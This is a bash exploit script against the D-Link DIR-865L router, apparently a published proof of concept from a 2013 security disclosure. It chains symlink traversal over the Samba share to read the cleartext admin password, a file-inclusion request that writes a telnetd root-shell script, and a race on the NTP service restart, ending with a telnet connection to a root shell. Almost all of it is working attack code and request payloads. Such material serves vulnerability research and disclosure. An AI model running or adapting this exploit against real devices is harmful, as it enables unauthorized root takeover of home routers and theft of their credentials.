#!/bin/bash
# D-Link DIR-865L Administrative Password and Root Shell Exploit
# Symlink Traversal - Discovered by Jacob Holcomb
# File Incluson - Discovered by Jacob Thompson
# Race Condition - Discovered by Jacob Thompson
# Exploited by Jacob Thompson, Independent Security Evaluators
# June 11, 2013
#
# This script assumes that an NTFS-formatted drive is connected to
# the router, that password protection is not enabled on the Samba share,
# that the drive's name is as shown below, and that the router is at
# its default IP address of 192.168.0.1.
#
# Even if the Samba share is password protected, an attacker with
# knowledge of the password can pass it to smbclient and the attack
# still works.
#
sharename="hp_v100w_00821"
set -e
tmpdir="`mktemp -d`"
trap "trap - 0 ERR; cd /; rm -rf \"""$tmpdir""\"" 0 ERR
cd "$tmpdir"

# create test.xml to be used later
ed <<\EOF
a
<?
 fwrite("w", "/var/run/ntp_run.sh", "#!/bin/sh\n/usr/sbin/telnetd -p 24 -l /bin/sh");
?>
.
w test.xml
q
EOF

# smbclient-rootlink is a patched version of smbclient that has a
# new "rootlink" command, used to create symbolic links to the root
# of the file system without performing any canonicalization or other
# processing of the / path.
#
# create symlink to root and retrieve clear text admin password
smbclient-rootlink "//192.168.0.1/$sharename" -N <<\EOF
put test.xml
rootlink root
cd root
cd var
get passwd
EOF
passwd=`cut -d\" -f4 < passwd`

# log in to the router
curl \
 -H 'Cookie: uid=0123456789' \
 -d 'REPORT_METHOD=xml' -d 'ACTION=login_plaintext' -d 'USER=Admin' \
 -d 'PASSWD='"$passwd"'&CAPTCHA=' \
 http://192.168.0.1/session.cgi 

# begin overwriting ntp_run.sh to take advantage of race condition later
while :; do 
curl \
http://192.168.0.1/router_info.xml?section=../../tmp/storage/"$sharename"/test
done &

# reconfigure and restart the NTP service to cause ntp_run.sh to be executed
curl \
 -H 'Cookie: uid=0123456789' \
 -d 'SERVICE=DEVICE.TIME' \
 -d 'ACTION=RESTART' \
 http://192.168.0.1/service.cgi

curl \
 -H 'Cookie: uid=0123456789' \
 -d@- \
 -H 'Content-Type: text/xml; charset=utf-8' \
 http://192.168.0.1/hedwig.cgi <<\EOF
<?xml version="1.0" encoding="UTF-8"?>
<postxml>
<module>
	<service>DEVICE.TIME</service>
	<device>
		<time>
			<ntp>
				<enable>1</enable>
				<period>604800</period>
				<server>ntp1.dlink.com</server>
			</ntp>
			<ntp6>
				<enable>1</enable>
				<period>604800</period>
			</ntp6>
			<timezone>61</timezone>
			<time/>
			<date/>
			<dst>0</dst>
			<dstmanual/>
			<dstoffset/>
		</time>
	</device>
</module>
<module>
	<service>RUNTIME.TIME</service>
	<runtime>
		<device>
			<date>01/01/2000</date>
			<time>01:13:49</time>
			<timestate>SUCCESS</timestate>
			<uptime>01/01/2000 01:13:49</uptime>
			<uptimes>4445</uptimes>
			<rfc1123time>Fri, 31 Dec 1999 17:13:49 GMT</rfc1123time>
			<ntp>
				<state>RUNNING</state>
				<server/>
				<uptime>12/31/1999 23:59:44</uptime>
				<uptimes/>
				<period/>
				<nexttime/>
				<nexttimes/>
			</ntp>
			<ntp6>
				<state>RUNNING</state>
				<server/>
				<uptime>12/31/1999 23:59:45</uptime>
				<uptimes/>
				<period/>
				<nexttime/>
				<nexttimes/>
			</ntp6>
			<timezone>
				<index>61</index>
				<name>(GMT+08:00) Taipei</name>
				<localename>(GMT+08:00) Taipei</localename>
				<dst>0</dst>
			</timezone>
		</device>
	</runtime>
	<ACTIVATE>ignore</ACTIVATE>
</module>
<module>
	<service>RUNTIME.SERVICES.TIMEZONE</service>	
	<runtime>
		<services>
			<timezone>												
						<valid>1</valid>
		<zone>
			<name>(GMT-12:00) International Date Line West</name>
			<gen>GMT+12:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-11:00) Midway Island, Samoa</name>
			<gen>GMT+11:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-10:00) Hawaii</name>
			<gen>GMT+10:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-09:00) Alaska</name>
			<gen>GMT+09:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-08:00) Pacific Time (US & Canada); Tijuana</name>
			<gen>PST+08:00</gen>
			<dst>PDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-07:00) Arizona</name>
			<gen>GMT+07:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-07:00) Chihuahua, La Paz, Mazatlan</name>
			<gen>GMT+07:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-07:00) Mountain Time (US & Canada)</name>
			<gen>GMT+07:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-06:00) Central America</name>
			<gen>GMT+06:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-06:00) Central Time (US & Canada)</name>
			<gen>GMT+06:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-06:00) Guadalajara, Mexico City, Monterrey</name>
			<gen>GMT+06:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-06:00) Saskatchewan</name>
			<gen>GMT+06:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-05:00) Bogota, Lima, Quito,Indiana (East)</name>
			<gen>GMT+05:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-05:00) Eastern Time (US & Canada)</name>
			<gen>EST+05:00</gen>
			<dst>EDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-04:30) Caracas</name>
			<gen>GMT+04:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-04:00) Georgetown, La Paz</name>
			<gen>GMT+04:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-04:00) Atlantic Time (Canada)</name>
			<gen>GMT+04:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-04:00) Santiago</name>
			<gen>GMT+04:00</gen>
			<dst>GDT,M10.2.6/00:00:00,M3.2.6/00:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-03:30) Newfoundland</name>
			<gen>GMT+03:30</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-03:00) Brasilia</name>
			<gen>GMT+03:00</gen>
			<dst>GDT,M11.1.0/00:00:00,M2.5.0/00:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-03:00) Buenos Aires</name>
			<gen>GMT+03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-03:00) Greenland</name>
			<gen>GMT+03:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-02:00) Mid-Atlantic</name>
			<gen>GMT+02:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M9.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-01:00) Azores</name>
			<gen>GMT+01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-01:00) Cape Verde Is.</name>
			<gen>GMT+01:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT) Casablanca, Monrovia</name>
			<gen>GMT+00:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</name>
			<gen>GMT+00:00</gen>
			<dst>GDT,M3.5.0/01:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) West Central Africa</name>
			<gen>GMT-01:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+02:00) Athens, Istanbul, Minsk</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M3.5.0/03:00:00,M10.5.0/04:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Bucharest</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M3.5.0/03:00:00,M10.5.0/04:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Cairo</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M4.5.5/00:00:00,M9.5.4/00:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Harare, Pretoria</name>
			<gen>GMT-02:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M3.5.0/03:00:00,M10.5.0/04:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Jerusalem</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M4.5.0/00:00:00,M10.5.0/01:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+03:00) Baghdad</name>
			<gen>GMT-03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+03:00) Kuwait, Riyadh</name>
			<gen>GMT-03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+03:00) Nairobi</name>
			<gen>GMT-03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+03:30) Tehran</name>
			<gen>GMT-03:30</gen>
			<dst>GDT,M3.4.1/02:30:00,M10.4.3/03:30:00</dst>
		</zone>
		<zone>
			<name>(GMT+04:00) Abu Dhabi, Muscat</name>
			<gen>GMT-04:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+04:00) Baku, Tbilisi, Yerevan</name>
			<gen>GMT-04:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+04:00) Moscow, St. Petersburg, Volgograd</name>
			<gen>GMT-04:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+04:30) Kabul</name>
			<gen>GMT-04:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+06:00) Ekaterinburg</name>
			<gen>GMT-06:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+05:00) Islamabad, Karachi, Tashkent</name>
			<gen>GMT-05:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</name>
			<gen>GMT-05:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+05:45) Kathmandu</name>
			<gen>GMT-05:45</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+07:00) Almaty, Novosibirsk</name>
			<gen>GMT-07:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+06:00) Astana, Dhaka</name>
			<gen>GMT-06:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+05:30) Sri Jayawardenepura</name>
			<gen>GMT-05:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+06:30) Rangoon</name>
			<gen>GMT-06:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+07:00) Bangkok, Hanoi, Jakarta</name>
			<gen>GMT-07:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+08:00) Krasnoyarsk</name>
			<gen>GMT-08:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</name>
			<gen>CST-08:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+09:00) Irkutsk, Ulaan Bataar</name>
			<gen>GMT-09:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+08:00) Kuala Lumpur, Singapore</name>
			<gen>GMT-08:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+08:00) Perth</name>
			<gen>GMT-08:00</gen>
			<dst>GDT,M10.5.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+08:00) Taipei</name>
			<gen>GMT-08:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+09:00) Osaka, Sapporo, Tokyo</name>
			<gen>GMT-09:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+09:00) Seoul</name>
			<gen>GMT-09:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Yakutsk</name>
			<gen>GMT-10:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+09:30) Adelaide</name>
			<gen>GMT-09:30</gen>
			<dst>GDT,M10.5.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+09:30) Darwin</name>
			<gen>GMT-09:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Brisbane</name>
			<gen>GMT-10:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Canberra, Melbourne, Sydney</name>
			<gen>GMT-10:00</gen>
			<dst>GDT,M10.5.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+10:00) Guam, Port Moresby</name>
			<gen>GMT-10:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Hobart</name>
			<gen>GMT-10:00</gen>
			<dst>GDT,M10.1.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+11:00) Vladivostok</name>
			<gen>GMT-11:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+12:00) Magadan, Solomon Is., New Caledonia</name>
			<gen>GMT-12:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+12:00) Auckland, Wellington</name>
			<gen>GMT-12:00</gen>
			<dst>GDT,M10.1.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+12:00) Fiji, Kamchatka, Marshall Is.</name>
			<gen>GMT-12:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+13:00) Nuku'alofa</name>
			<gen>GMT-13:00</gen>
			<dst/>
		</zone>

			</timezone>
		</services>
	</runtime>
	<SETCFG>ignore</SETCFG>
	<FATLADY>ignore</FATLADY>
	<ACTIVATE>ignore</ACTIVATE>			
</module>
</postxml>
EOF

curl \
 -H 'Cookie: uid=0123456789' \
 -d 'ACTIONS=SETCFG%2CSAVE%2CACTIVATE' \
 http://192.168.0.1/pigwidgeon.cgi || echo [ $? == 52 ]

# wait for ntp_run.sh to execute
sleep 5

# stop executing and connect
kill %

trap - 0 ERR
cd /
rm -rf "$tmpdir"

exec telnet 192.168.0.1 24